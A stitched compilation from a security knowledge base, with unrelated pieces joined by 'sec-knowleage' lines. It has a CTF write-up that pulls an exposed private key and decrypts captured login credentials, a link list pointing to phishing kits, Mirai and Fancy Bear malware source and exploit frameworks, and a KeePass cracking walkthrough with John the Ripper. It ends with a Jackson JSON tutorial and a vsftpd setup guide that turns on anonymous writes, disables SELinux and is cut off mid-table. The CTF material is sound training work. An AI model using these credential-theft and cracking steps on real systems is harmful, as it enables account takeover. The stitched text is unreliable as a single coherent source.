172.26.240.1 DNS 87 Standard query 0x6a97 AAAA cyplogin.appsecil.ctf.today 588 55.376456 172.26.255.42 → 3.70.105.34 HTTP2 510 HEADERS[43]: GET /login_api.php?un=ZkR6K1B3MTJpbDNCODhKeklNcjYzNHhKRTFOMVBHUVVDdW9lMXNveXBNc3doTEs2ZE85L3dvNUEzMW5jWHltR2RaY0tsMFVsWU4yWWMwTmswVXZaMGpUR0llMzVZRGJwK082UmM1K2JiM1g2Z2FDZlVVOEx1ZjQyeGRqOGFxNjlUNmxDRnJ2cCtYNXJxN25FU1pRMGtDc3hERnIwY2poNWpOTVlhT0xJa0pjQjI5eVdESnl3VWtycEs1QmVpQWx1eFh1N3U5VnJsV29USjRpMWZhVHBLZjlUZklOZWxVVUJKVHN2bXdOeHlFSU1LVDNrbnZYdkRuWStKRVM5K1llK3JEckxRV29XSDZuc1NUYktoVWZ2eERRczl5ZW9OWXdLTTZmbGxreStVd25aUFZXbEhlSEJTM1BUZGM0WGs4ZzNrSXpGYjhEakUxdUlrNXAybVQrNThBPT0=, WINDOW_UPDATE[43] 589 55.395658 172.26.255.42 → 172.26.240.1 DNS 87 Standard query 0x6a97 AAAA cyplogin.appsecil.ctf.today 590 55.443679 3.70.105.34 → 172.26.255.42 HTTP2 299 HEADERS[41]: 200 OK, DATA[41] 591 55.443907 3.70.105.34 → 172.26.255.42 HTTP2 85 DATA[41] (text/html) 592 55.444105 3.70.105.34 → 172.26.255.42 HTTP2 330 DATA[43] (text/html) 593 55.451652 172.26.240.1 → 172.26.255.42 DNS 174 Standard query response 0x6a97 AAAA cyplogin.appsecil.ctf.today SOA ns-1633.awsdns-12.co.uk 594 59.258073 172.26.255.42 → 69.16.175.42 HTTP2 93 PING[0] 595 59.313835 69.16.175.42 → 172.26.255.42 HTTP2 93 PING[0] 596 60.259799 172.26.255.42 → 146.75.122.208 HTTP2 100 PING[0] 597 60.316825 146.75.122.208 → 172.26.255.42 HTTP2 100 PING[0] ``` The user is trying to access `cyplogin.appsecil.ctf.today/`, what's there? ```html <form> <div class="form-outline mb-4"> <input type="text" id="form2Example1" class="form-control" /> <label class="form-label" for="form2Example1">Username</label> </div> <div class="form-outline mb-4"> <input type="password" id="form2Example2" class="form-control" /> <label class="form-label" for="form2Example2">Password</label> </div> <div class="row mb-4"> <div class="col d-flex justify-content-left"> <div class="form-check"> <input class="form-check-input" type="checkbox" value="" id="form2Example31" checked /> <label class="form-check-label" for="form2Example31"> Remember me </label> </div> </div> </div> <input type="submit" id="connect" class="btn btn-primary btn-block mb-4" value="Connect"> <div class="text-center"> <p>Need an account? Contact IT support.</a></p> </div> </form> ``` It's a login form, with a twist in one of the Javascript files: ```javascript $(function () { $("#badmsg").hide(); $("#okmsg").hide(); $("#connect").on( "click", function( event ) { event.preventDefault(); var pub = ` -----BEGIN PUBLIC KEY----- MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA4bLRQC/NMtVgvVxrxBXg KwU1xpYFA+bONPnAmYw9QmaBWnitHfjAXDjMR+/f8TtuJVk1ikt/aJ7W0MkzyznN laRcAfvIUteN9gksZ0zhNl0d7pFVcwgm2yn52XgAafcHCumrCOlG7G/iClfHJB/w UAWfmPeDP9ij1COYT20/9OiI/0XFCNps99l+CnPyqKOgn4+KJLnAjCapWwxJFqKm JKTi2MvPQV7Pa1arcNRko10xd5oygouyMRQsjcz407wFCxNwUOx4zNImEENG+24g POOiUagk7KD2DWj+M6q/IgLztTpW+nP/QH40UoWcXGPMgiCC9aGhJ2NnKKFY+Oht 5wIDAQAB -----END PUBLIC KEY----- `; var userName = $("#form2Example1").val(); var password = $("#form2Example2").val(); var encrypt = new JSEncrypt(); encrypt.setPublicKey(pub); var encrypted = btoa(encrypt.encrypt(userName+":"+password)); $.get("login_api.php?un="+encrypted, function(data, status){ if(data == "wrong username / password."){ $("#badmsg").show(); $("#badmsg").html(data); $("#okmsg").hide(); }else{ $("#badmsg").hide(); $("#okmsg").show(); $("#okmsg").html(data); // need to fix that secret path //window.location=data; } }); return false; }); }); ``` Instead of sending the username and password on the clear, it first encrypts them with a public key, then base64-encodes them. That must be what we see in the network capture. We can resend the requests to see what we get: ```console ┌──(user@kali)-[/media/sf_CTFs/appsec/CypLogin] └─$ curl "https://cyplogin.appsecil.ctf.today/login_api.php?un=clgyMHRibThGaVR3OElsZkpnN3NZamo2TDM3RjhmUzF4S0pyWlhXK3J4MTdDang1S2RWcWxDUFZVWEx6S3B1RkxOTk96TzRsbUZQSEVGa0xDTTZLTUFldW9JT3FFS0lnKzcwSWU0MzZCNHFveFFqSFRkYVR3c3JkclBBcHIwVkk5Y3p5bUFQMzhQSnJlUlZUWDVySlUvMkFxajZNSmZIZGlRYjhVc2tvMUZKTGhScE03SzVQbzkvNzZpdHJTdE9OazNnc1JMZzNkdGQ3Y2UxdGIzY3BEYXJUbnA4T0VTY0tpVXdnNFQwR3RHM25UOEFFZ0V3Z3Q3L2NYRnA0c0JURmFmeEtSd2hmNWJ0TFNjZ1hXWjgvZlRVMGJ4d1hBdmFGTzVXamt2WFdrOEJYRTBuakovVFdpOUZsSGJCUnBEK0RXVXdGOUxsTGU2VFhzQWUzMStwS3JBPT0=" wrong username / password. ┌──(user@kali)-[/media/sf_CTFs/appsec/CypLogin] └─$ curl "https://cyplogin.appsecil.ctf.today/login_api.php?un=ZkR6K1B3MTJpbDNCODhKeklNcjYzNHhKRTFOMVBHUVVDdW9lMXNveXBNc3doTEs2ZE85L3dvNUEzMW5jWHltR2RaY0tsMFVsWU4yWWMwTmswVXZaMGpUR0llMzVZRGJwK082UmM1K2JiM1g2Z2FDZlVVOEx1ZjQyeGRqOGFxNjlUNmxDRnJ2cCtYNXJxN25FU1pRMGtDc3hERnIwY2poNWpOTVlhT0xJa0pjQjI5eVdESnl3VWtycEs1QmVpQWx1eFh1N3U5VnJsV29USjRpMWZhVHBLZjlUZklOZWxVVUJKVHN2bXdOeHlFSU1LVDNrbnZYdkRuWStKRVM5K1llK3JEckxRV29XSDZuc1NUYktoVWZ2eERRczl5ZW9OWXdLTTZmbGxreStVd25aUFZXbEhlSEJTM1BUZGM0WGs4ZzNrSXpGYjhEakUxdUlrNXAybVQrNThBPT0=" The password is the key to the kingdom. ``` So we're looking for the password. Can we attack the public key? ```console ┌──(user@kali)-[/media/sf_CTFs/appsec/CypLogin] └─$ openssl rsa -pubin -in key.pub -text RSA Public-Key: (2048 bit) Modulus: 00:e1:b2:d1:40:2f:cd:32:d5:60:bd:5c:6b:c4:15: e0:2b:05:35:c6:96:05:03:e6:ce:34:f9:c0:99:8c: 3d:42:66:81:5a:78:ad:1d:f8:c0:5c:38:cc:47:ef: df:f1:3b:6e:25:59:35:8a:4b:7f:68:9e:d6:d0:c9: 33:cb:39:cd:95:a4:5c:01:fb:c8:52:d7:8d:f6:09: 2c:67:4c:e1:36:5d:1d:ee:91:55:73:08:26:db:29: f9:d9:78:00:69:f7:07:0a:e9:ab:08:e9:46:ec:6f: e2:0a:57:c7:24:1f:f0:50:05:9f:98:f7:83:3f:d8: a3:d4:23:98:4f:6d:3f:f4:e8:88:ff:45:c5:08:da: 6c:f7:d9:7e:0a:73:f2:a8:a3:a0:9f:8f:8a:24:b9: c0:8c:26:a9:5b:0c:49:16:a2:a6:24:a4:e2:d8:cb: cf:41:5e:cf:6b:56:ab:70:d4:64:a3:5d:31:77:9a: 32:82:8b:b2:31:14:2c:8d:cc:f8:d3:bc:05:0b:13: 70:50:ec:78:cc:d2:26:10:43:46:fb:6e:20:3c:e3: a2:51:a8:24:ec:a0:f6:0d:68:fe:33:aa:bf:22:02: f3:b5:3a:56:fa:73:ff:40:7e:34:52:85:9c:5c:63: cc:82:20:82:f5:a1:a1:27:63:67:28:a1:58:f8:e8: 6d:e7 Exponent: 65537 (0x10001) writing RSA key -----BEGIN PUBLIC KEY----- MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA4bLRQC/NMtVgvVxrxBXg KwU1xpYFA+bONPnAmYw9QmaBWnitHfjAXDjMR+/f8TtuJVk1ikt/aJ7W0MkzyznN laRcAfvIUteN9gksZ0zhNl0d7pFVcwgm2yn52XgAafcHCumrCOlG7G/iClfHJB/w UAWfmPeDP9ij1COYT20/9OiI/0XFCNps99l+CnPyqKOgn4+KJLnAjCapWwxJFqKm JKTi2MvPQV7Pa1arcNRko10xd5oygouyMRQsjcz407wFCxNwUOx4zNImEENG+24g POOiUagk7KD2DWj+M6q/IgLztTpW+nP/QH40UoWcXGPMgiCC9aGhJ2NnKKFY+Oht 5wIDAQAB -----END PUBLIC KEY----- ``` Long story short, we can't. BUT - this isn't a crypto challenge anyway, it's a web/forensics challenge. We've done some forensics, let's do some web: ```console ┌──(user@kali)-[/media/sf_CTFs/appsec/CypLogin] └─$ curl "https://cyplogin.appsecil.ctf.today/robots.txt" User-agent: Googlebot Disallow: /js Disallow: /css Disallow: /uploads Disallow: /admin ``` If we inspect the "/uploads" directory, we find a pleasant surprise: ```console ┌──(user@kali)-[/media/sf_CTFs/appsec/CypLogin] └─$ curl "https://cyplogin.appsecil.ctf.today/uploads/" <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN"> <html> <head> <title>Index of /uploads</title> </head> <body> <h1>Index of /uploads</h1> <table> <tr><th valign="top"><img src="/icons/blank.gif" alt="[ICO]"></th><th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a></th></tr> <tr><th colspan="5"><hr></th></tr> <tr><td valign="top"><img src="/icons/back.gif" alt="[PARENTDIR]"></td><td><a href="/">Parent Directory</a></td><td>&nbsp;</td><td align="right"> - </td><td>&nbsp;</td></tr> <tr><td valign="top"><img src="/icons/folder.gif" alt="[DIR]"></td><td><a href="05052023/">05052023/</a></td><td align="right">2023-05-17 13:27 </td><td align="right"> - </td><td>&nbsp;</td></tr> <tr><th colspan="5"><hr></th></tr> </table> <address>Apache/2.4.52 (Debian) Server at cyplogin.appsecil.ctf.today Port 80</address> </body></html> ┌──(user@kali)-[/media/sf_CTFs/appsec/CypLogin] └─$ curl "https://cyplogin.appsecil.ctf.today/uploads/05052023/" <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN"> <html> <head> <title>Index of /uploads/05052023</title> </head> <body> <h1>Index of /uploads/05052023</h1> <table> <tr><th valign="top"><img src="/icons/blank.gif" alt="[ICO]"></th><th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a></th></tr> <tr><th colspan="5"><hr></th></tr> <tr><td valign="top"><img src="/icons/back.gif" alt="[PARENTDIR]"></td><td><a href="/uploads/">Parent Directory</a></td><td>&nbsp;</td><td align="right"> - </td><td>&nbsp;</td></tr> <tr><td valign="top"><img src="/icons/unknown.gif" alt="[ ]"></td><td><a href="key.pem">key.pem</a></td><td align="right">2023-05-17 13:27 </td><td align="right">1.6K</td><td>&nbsp;</td></tr> <tr><th colspan="5"><hr></th></tr> </table> <address>Apache/2.4.52 (Debian) Server at cyplogin.appsecil.ctf.today Port 80</address> </body></html> ┌──(user@kali)-[/media/sf_CTFs/appsec/CypLogin] └─$ curl https://cyplogin.appsecil.ctf.today/uploads/05052023/key.pem -----BEGIN RSA PRIVATE KEY----- MIIEpAIBAAKCAQEA4bLRQC/NMtVgvVxrxBXgKwU1xpYFA+bONPnAmYw9QmaBWnit HfjAXDjMR+/f8TtuJVk1ikt/aJ7W0MkzyznNlaRcAfvIUteN9gksZ0zhNl0d7pFV cwgm2yn52XgAafcHCumrCOlG7G/iClfHJB/wUAWfmPeDP9ij1COYT20/9OiI/0XF CNps99l+CnPyqKOgn4+KJLnAjCapWwxJFqKmJKTi2MvPQV7Pa1arcNRko10xd5oy gouyMRQsjcz407wFCxNwUOx4zNImEENG+24gPOOiUagk7KD2DWj+M6q/IgLztTpW +nP/QH40UoWcXGPMgiCC9aGhJ2NnKKFY+Oht5wIDAQABAoIBAQCP7Zm1ZgZkcWBU wZhTnmOq65KkhkzCdTBw5ggloyH5syawTB6R62y4Itxaz6Su0GhoVuBmxciFLi3t TTHDWqQ41mx6M1dHRQDZsnXnlkZUhcMtvO6SAdPNlZIoVXdmG8sY8XRJpYG+C4dJ czqiVd/JGBzzznubforTILPjitbrVR/kVnVwgIXoy+tQ6WD9WkAuvHfTwARwanh6 sJQ4pRWqh48HO+zFiIMvKDtfArFsy44pfCLcbqr3vSBMnci62I0Cqe/eEGF+sg8R hjkMgr4bN2bNuZ3JCBS0o5uS7RJBCXH2li6rzju8uhBB7bxsq7VdnLSf3JODQLvD u+JtiTZxAoGBAP4QIs4EE8a9GFI05q9O3TVF5uLWpfosfGWMz+q96fl/mjaNu23H nuoUUGkQoD5qFpgLy1DhCZPzjTCYfQJL3K7UyxV8gsO8cZG7mCedsDngdogAb7o4 trfluiEf4Xq0iadQKH59PMZHs5Y2HshMajAOMBL7hYdcyaR/94GHY3jvAoGBAONr UkRPPjcU6Bds4FGAh3ieNFi6Bs/1E7ut4xdKTN1uEhsafViQ//57EFztlAQFwULh foBbCcHUY84+6jxkvcnm1H00pFFtY3Qk6B2zokIVXKsMUBg2vJEstcpGa9ERGRxf CpkC6n+MnIxiThqeY/LGzbX+R6sqz6uQKGLDgqqJAoGBANXwmo5nKowZYeifuX34 aBhbM7Di1cOUQHB3IgJnSCacSC0WLrWj+nLdBlVi9b15Mmt4yw3hYmJfHg7E6cfM QBpNAHKodakD/5KbqOX7SJGELewaifsDlQHIhnMsWIAulRf6TQ8uwMWrTVP5YPSE PIsY92yUtv2kqfxG8hH2A1KrAoGAWCWu+18jpEHsO7gtsil5WN0pOQLRxSUfAu3B SbO421LgnbTExOFe+ApHK13Cs1Rvtjaky6d9vq1OChEExWfe0DUyQ112G0Gk/M2Z Unnf+HFDO+FH4jrFGBgWVlK5U42nCAImn2wr7EhaHWe1Ekg2QVGhRltK+CNd3we/ P5i8OtECgYBNBKR0BnwU1cOtmKQk3Qw3jfUWqRfveNoB8p+ceTdiqs8FO9l9LZXz CcuDqVFMMMwGPW9eLYLwd/MoeXdtmo33xXwsFAG/jPfimN45KWmsqwE8bpoDBHTv TkuvNOYzJslyd6zYbcArdO7a48IkBVQy0s6VvvIuQLMG8ZkwrrNWVA== -----END RSA PRIVATE KEY----- ``` Let's use it to decrypt: ```console ┌──(user@kali)-[/media/sf_CTFs/appsec/CypLogin] └─$ echo ZkR6K1B3MTJpbDNCODhKeklNcjYzNHhKRTFOMVBHUVVDdW9lMXNveXBNc3doTEs2ZE85L3dvNUEzMW5jWHltR2RaY0tsMFVsWU4yWWMwTmswVXZaMGpUR0llMzVZRGJwK082UmM1K2JiM1g2Z2FDZlVVOEx1ZjQyeGRqOGFxNjlUNmxDRnJ2cCtYNXJxN25FU1pRMGtDc3hERnIwY2poNWpOTVlhT0xJa0pjQjI5eVdESnl3VWtycEs1QmVpQWx1eFh1N3U5VnJsV29USjRpMWZhVHBLZjlUZklOZWxVVUJKVHN2bXdOeHlFSU1LVDNrbnZYdkRuWStKRVM5K1llK3JEckxRV29XSDZuc1NUYktoVWZ2eERRczl5ZW9OWXdLTTZmbGxreStVd25aUFZXbEhlSEJTM1BUZGM0WGs4ZzNrSXpGYjhEakUxdUlrNXAybVQrNThBPT0= | base64 -d | base64 -d | openssl rsautl -decrypt -inkey key.pem admin:AppSec-IL{Wh7t_D4_F7ck_RS4} ```
sec-knowleage
## Android Dynamic Analysis [DIVA Android - Damn Insecure and vulnerable App for Android](https://github.com/payatu/diva-android/) [Android Xposed Module to bypass SSL certificate validation (Certificate Pinning)](https://github.com/ac-pm/SSLUnpinning_Xposed) [Android Secure Coding Standard](https://www.securecoding.cert.org/confluence/display/android/Android+Secure+Coding+Standard) [Android CVE-2016-3866 的 Poc](https://github.com/ele7enxxh/android-afl) [常见app加固厂商脱壳方法研究](http://www.mottoin.com/89035.html) [移动安全学习资料 ( 包括ios/Android/wp ) ](https://mobilesecuritywiki.com/) [OSTrICa—开源的威胁情报收集器](http://www.freebuf.com/sectool/111049.html) [Androl4b,基于ubuntu mate的安卓安全评估&测试系统,系统集成了一系列Android 应用程序评估测试所需的工具,可用于逆向工程和恶意软件分析。文中详细介绍ADB的一些使用、Drozer和ApkTool的安装和运行](https://github.com/sh4hin/Androl4b) [APKiD 查壳工具](https://rednaga.github.io/2016/07/31/detecting_pirated_and_malicious_android_apps_with_apkid/) [Samsung 基带实现中的安全漏洞及利用](https://github.com/comsecuris/shannonRE) [AndroidBinder - Android 内核 IPC 防火墙](https://github.com/dxwu/AndroidBinder) [一个新的 Android 插桩框架 Diff-Droid ](https://github.com/antojoseph/diff-gui) [OSTrICa - 一款开源的威胁情报收集工具](https://github.com/Ptr32Void/OSTrICa) [Inspector : 面向andorid通过API HOOKS实行动态分析的开源工具](https://github.com/ac-pm/Inspeckage) [usb2fac - 为新插入的 USB 设备提供两步验证的工具](https://github.com/uber/usb2fac) [一些比较好的安全会议整理](https://github.com/PaulSec/awesome-sec-talks) [应用安全相关的学习资料,包括书、网站](https://github.com/paragonie/awesome-appsec) [绕过iOS 9.3.5代码签名的POC](https://github.com/kpwn/935csbypass) [乌云知识库的一个搜索工具](https://github.com/grt1st/wooyun_search) [Qark - LinkedIn 开源的一个 Android APK 静态代码分析工具](https://github.com/linkedin/qark) [iOS Security Audit Toolit - A semi-automatic tool for iOS App security audit and iOS reverse engineering](https://github.com/alibaba/iOSSecAudit) [MITMCanary - 检测中间人攻击](https://github.com/CylanceSPEAR/mitmcanary) [facebook钓鱼网站代码](https://github.com/navdeeshahuja/Facebook-Phishing-Page) [Mirai是利用IOT设备进行DDOS攻击的僵尸网络](https://github.com/jgamblin/Mirai-Source-Code) [研究员 heisecode 公开了几个 iOS/Android 相关的漏洞](https://github.com/heisecode/Bug_POCs) [UMAP2 - NCC Group 开源的一个 USB Host 安全评估工具](https://github.com/nccgroup/umap2) [BadUSB 2.0 USB-HID 中间人劫持 PoC](https://github.com/withdk/badusb2-mitm-poc) [github上关于android通用root的收集android-rooting-tools,已经有黑产机智的用上了。](https://github.com/android-rooting-tools) [Strongdb - 用于辅助调试 Android Native 的 GDB UI 插件,使调试 Native 程序时有更友好的界面](https://github.com/cx9527/strongdb) [一个在线分析打包的andorid恶意软件系统](https://github.com/CvvT/AppTroy) [seekret - 在 GitHub 上搜索敏感信息的工具(密钥、Token、证书等)](https://github.com/apuigsech/seekret) [ProbeDroid - Android 动态二进制插桩工具,支持 5.0 及以上版本](https://github.com/ZSShen/ProbeDroid) [Liberation - iOS 代码注入引擎,基于 Keystone 汇编工具](https://github.com/iOSCheaters/Liberation) [逆向相关的资料收集整理](https://github.com/0xtyh/awesome-reversing) [android上的WPS攻击工具](https://github.com/Droid-MAX/bully) [Android 安全概览手册,来自作者 doridori 的个人总结和资料收集](https://github.com/doridori/Android-Security-Reference) [JADE - 基于Soot的APK漏洞分析工具已上传开源版本,附上规则文件、编译好的binary,即下即用。](https://github.com/flankerhqd/JADE) [MopEye - 一个基于 VPN 服务、用于监控 Android APP 网络活动的工具](https://daoyuan14.github.io/papers/CoNEXT15_Poster_MopEye.pdf) [web和android安全评估方面的cheatsheets](https://github.com/iamthefrogy/Application-Security) [Malware Exploit Database](https://github.com/misterch0c/malSploitBase) [jniostorlab - Script to enumerate JNI methods in ELF files.](https://github.com/ostorlab/jniostorlab) [新一代的Exploit 开发工具包](https://github.com/b3mb4m/shellsploit-framework) [WiFi-Pumpkin v0.7.5:虚假WIFI访问点的利用框架](https://github.com/P0cL4bs/WiFi-Pumpkin) [BugId - SkyLined 写的一个漏洞检测、分析工具](https://github.com/SkyLined/BugId) [XSS 检测逃逸(Payload 生成器 + 自删除代码)](http://brutelogic.com.br/blog/avoiding-xss-detection/) [MLeaksFinder:精准 iOS 内存泄露检测工具](http://wereadteam.github.io/2016/02/22/MLeaksFinder/) [Mobile-Security-Framework-MobSF](https://github.com/ajinabraham/Mobile-Security-Framework-MobSF) [Machinae:一款使用Python编写的安全情报收集工具,其灵感来自automater,支持收集IP地址、域名、URL、邮箱和文件hash和SSL指纹等信息](https://github.com/HurricaneLabs/machinae) [AndroidKernelExploitationPlayground - Android 内核漏洞利用练习](https://github.com/Fuzion24/AndroidKernelExploitationPlayground) [这个工具主要是内核方面的,之前还推送过 Android 应用方面的漏洞靶场](https://github.com/nil1666/AuditDroid) [diva](https://github.com/payatu/diva-android/) [honggfuzz 发布 0.7 版本, honggfuzz 是个通用型 Android Fuzz 工具, 支持 Linux、 Mac OS X、 Windows 等多种操作系统, 另外支持 AddressSanitizer 代码覆盖率评估、 支持 Intel BTS、 支持 AMD/Intel 指令/分支计数](https://github.com/google/honggfuzz/releases/tag/0.7) [Android 内核安全机制概览 ](https://github.com/ukanth/afwall/wiki/Kernel-security) [WhatsPwn:在andorid上提取敏感数据。注入后门的工具](https://github.com/jlrodriguezf/WhatsPwn) [Lisa,Exploit开发利器,作者把它称为Exploit开发的瑞士军刀](https://github.com/ant4g0nist/lisa.py) [swift for android demo](https://github.com/Ecco/HelloSwift) [andorid恶意分析脚本](https://github.com/acgmohu/amas) [Anti-Sandbox and Anti-Virtual Machine Tool, Sems - 用于探测各种沙盒、虚拟机环境的工具](https://github.com/AlicanAkyol/sems) [FeatherDuster - NCC Group 开源的一个加密破坏工具](https://github.com/nccgroup/featherduster) [Census Shadow - Firefox/jemalloc 堆利用瑞士军刀,之前推送过这个工具,该工具目前正在考虑支持 Android jemalloc](https://github.com/CENSUS/shadow) [Android tty_insert_flip_string_fixed_flag 条件竞争漏洞(CVE-2014-0196) PoC](https://github.com/anarcheuz/Android-PoCs/tree/master/CVE-2014-0196) [su-a-cyder - An Home-Brewed iOS Malware PoC Generator su-a-cyder](https://github.com/Mi3Security/su-a-cyder) [MARA_Framework -- 一个用于逆向移动应用与分析的框架](https://github.com/xtiankisutsa/MARA_Framework) [su-a-cyder - An Home-Brewed iOS Malware PoC Generator su-a-cyder](https://github.com/Mi3Security/su-a-cyder) [MARA_Framework -- 一个用于逆向移动应用与分析的框架](https://github.com/xtiankisutsa/MARA_Framework) [AndroidViewClient - 脚本测试工具 + monkeyrunner扩展 + 纯python语言](https://github.com/dtmilano/AndroidViewClient) [SSLyze - SSL安全扫描器](http://www.freebuf.com/sectool/22984.html) [Recon - Android网络中隐私泄漏检测](https://github.com/Eyasics/recon) [MobSF - Mobile-security-Framework](https://github.com/ajinabraham/Mobile-Security-Framework-MobSF) [DECAF - Dynamic Executable code Analysis Framework](https://github.com/sycurelab/DECAF) [SMVHunter - Android SSL/TLS中间人攻击检测](https://github.com/utds3lab/SMVHunter) [Awesome-Hacking:优秀的安全/黑客学习资源汇总](https://github.com/Hack-with-Github/Awesome-Hacking) [两个Android 漏洞(cve-2016-6700,cve-2016-6702)PoC](https://github.com/ele7enxxh/poc-exp) [Threat-Intelligence-Analyst](https://github.com/pandazheng/Threat-Intelligence-Analyst) [移动应用渗透测试备忘录](https://github.com/sh4hin/MobileApp-Pentest-Cheatsheet) [FirePhish -- 一个网络钓鱼框架](https://github.com/Raikia/FirePhish) [Fancy Bear 源码](https://github.com/rickey-g/fancybear) [simplify 反混淆工具](https://github.com/CalebFenton/simplify) [应急响应大合集](https://github.com/meirwah/awesome-incident-response/blob/master/README_ch.md) [一些优秀的POC列表](https://github.com/qazbnm456/awesome-cve-poc) [Poc, Presentation of Monitor OSD Exploitation, and shenanigans of high quality.](https://github.com/RedBalloonShenanigans/MonitorDarkly)
sec-knowleage
# Zoo World Category: Beginners ## Description > Passwords have become one of the only layers of protections between hackers and our personal information, we use passwords for almost everything, but some don't use them well. > > Using the same password for multiple services or using a weak and predictable password is one of the leading casues for information theft and account hacking, in this challenge we'll see how easy it is to crack a weak and predictable password. > > For this challenge we'll need 2 things, the first one is a hash cracking tool, the 2 major tools used today are Hashcat and John the Ripper, the second thing is a password list, preferably ordered by most used to least used, for that we're going to use rockyou.txt, which you can find here, rockyou.txt is a list of password created after the 2009 data breach of rockyou that exposed 3.2 million unhashed passwords of its users, this passwords list is used widely today for password cracking and strong passwords verification. > > Now using this tools try to get the flag from this file. A binary file was attached. ## Solution Let's check the attached file: ```console root@kali:/media/sf_CTFs/technion/Zoo_World# file my_personal_flag my_personal_flag: Keepass password database 2.x KDBX ``` We can use `John the Ripper` to crack its password: ```console oot@kali:/media/sf_CTFs/technion/Zoo_World# keepass2john my_personal_flag > my_personal_flag.hash root@kali:/media/sf_CTFs/technion/Zoo_World# ~/utils/john/run/john my_personal_flag.hash --wordlist=/root/utils/dictionaries/rockyou.txt Using default input encoding: UTF-8 Loaded 1 password hash (KeePass [SHA256 AES 32/64 OpenSSL]) Cost 1 (iteration count) is 60000 for all loaded hashes Cost 2 (version) is 2 for all loaded hashes Cost 3 (algorithm [0=AES, 1=TwoFish, 2=ChaCha]) is 0 for all loaded hashes Warning: OpenMP is disabled; a non-OpenMP build may be faster Press 'q' or Ctrl-C to abort, almost any other key for status trouble (my_personal_flag) 1g 0:00:00:17 DONE (2020-12-12 19:37) 0.05685g/s 54.00p/s 54.00c/s 54.00C/s trouble Use the "--show" option to display all of the cracked passwords reliably Session completed ``` The password is `trouble`. Now we can use [pykeepass](https://pypi.org/project/pykeepass/) to export the file: ```python >>> from pykeepass import PyKeePass >>> kp = PyKeePass('my_personal_flag', 'trouble') >>> kp.dump_xml("out.xml") ``` The flag in in the XML: ```console root@kali:/media/sf_CTFs/technion/Zoo_World# cat out.xml | grep cstechnion <Value>cstechnion{pl3ase_us3_str0ng_pass}</Value> ```
sec-knowleage
# jackson --- ## jackson 解析器 在 Java 里面常见的 json 解析器有 ``` Jsonlib,Gson,fastjson,jackson ``` 常用方法 1. readValue(json 字符串数据, Class) json 转换为 java 对象 2. writeValue(参数,obj): * File:将 obj 对象转换为 JSON 字符串,并保存到指定的文件中 * Writer:将 obj 对象转换为 JSON 字符串,并将 json 数据填充到字符输出流中 * OutputStream:将 obj 对象转换为 JSON 字符串,并将 json 数据填充到字节输出流中 3. writeValueAsString(obj): 将对象转为 json 字符串 ## 对象转 Json ```java import com.fasterxml.jackson.core.JsonProcessingException; import com.fasterxml.jackson.databind.ObjectMapper; public class jsonDemo { public static void main(String[] args) { Person person = new Person(); person.setName("xiaoming"); person.setSex("name"); person.setAge(18); ObjectMapper objectMapper = new ObjectMapper(); try { String s = objectMapper.writeValueAsString(person); System.out.println(s); } catch (JsonProcessingException e) { e.printStackTrace(); } } } ``` ```java public class Person { public String name; public String Sex; public int Age; public void setName(String name) { this.name = name; } public void setSex(String Sex) { this.Sex = Sex; } public void setAge(int Age) { this.Age = Age;; } } ``` 运行后显示数据 ``` {"name":"xiaoming","Sex":"name","Age":18} ``` ## list集合转换json ```java import com.fasterxml.jackson.core.JsonProcessingException; import com.fasterxml.jackson.databind.ObjectMapper; import java.util.ArrayList; import java.util.List; public class jsonDemo { public static void main(String[] args) { Person p1= new Person(); p1.setName("xiaoming"); p1.setSex("name"); p1.setAge(18); Person p2= new Person(); p2.setName("xiaoming"); p2.setSex("name"); p2.setAge(18); ObjectMapper objectMapper = new ObjectMapper(); List<Person> list = new ArrayList<>(); list.add(p1); list.add(p2); try { String s = objectMapper.writeValueAsString(list); System.out.println(s); } catch (JsonProcessingException e) { e.printStackTrace(); } } } ``` ``` [{"name":"xiaoming","Sex":"name","Age":18},{"name":"xiaoming","Sex":"name","Age":18}] ``` ## json转Java对象 ```java import com.fasterxml.jackson.core.JsonProcessingException; import com.fasterxml.jackson.databind.ObjectMapper; import java.io.IOException; import java.util.ArrayList; import java.util.List; public class jsonDemo { public static void main(String[] args) throws IOException { String json = "{\"sex\":\"男\",\"age\":\"18\",\"name\":\"xiaoming\"}"; ObjectMapper objectMapper = new ObjectMapper(); Person person = objectMapper.readValue(json, Person.class); System.out.println(person.toString()); } } ``` --- ## Source & Reference - https://www.cnblogs.com/nice0e3/p/13552644.html
sec-knowleage
# VSFTP 配置案例 --- **安装** - **服务端** `yum install -y vsftpd` - **客户端** `yum install -y ftp` --- ## 匿名访问 |参数|作用| | :------------- | :------------- | |anonymous_enable=YES | 允许匿名访问模式 | |anon_umask=022 | 匿名用户上传文件的 umask 值| |anon_upload_enable=YES | 允许匿名用户上传文件| |anon_mkdir_write_enable=YES | 允许匿名用户创建目录| |anon_other_write_enable=YES | 允许匿名用户修改目录名称或删除目录| ```vim vim /etc/vsftpd/vsftpd.conf 1 anonymous_enable=YES 2 anon_umask=022 3 anon_upload_enable=YES 4 anon_mkdir_write_enable=YES 5 anon_other_write_enable=YES ``` ```bash setenforce 0 firewall-cmd --permanent --zone=public --add-service=ftp firewall-cmd --reload systemctl restart vsftpd systemctl enable vsftpd ``` 现在就可以在客户端执行 ftp 命令连接到远程的 FTP 服务器了. 在 vsftpd 服务程序的匿名开放认证模式下,其账户统一为 anonymous,密码为空.而且在连接到 FTP 服务器后,默认访问的是 `/var/ftp` 目录. 我们可以切换到该目录下的 pub 目录中,然后尝试创建一个新的目录文件,以检验是否拥有写入权限: ```bash [root@linuxprobe ~]# ftp 192.168.10.10 Connected to 192.168.10.10 (192.168.10.10). 220 (vsFTPd 3.0.2) Name (192.168.10.10:root): anonymous 331 Please specify the password. Password:此处敲击回车即可 230 Login successful. Remote system type is UNIX. Using binary mode to transfer files. ftp> cd pub 250 Directory successfully changed. ftp> mkdir files 257 "/pub/files" created ftp> rename files database 350 Ready for RNTO. 250 Rename successful. ftp> rmdir database 250 Remove directory operation successful. ftp> exit 221 Goodbye. ``` --- ## 本地用户 |参数 | 作用| | :------------- | :------------- | |anonymous_enable=NO 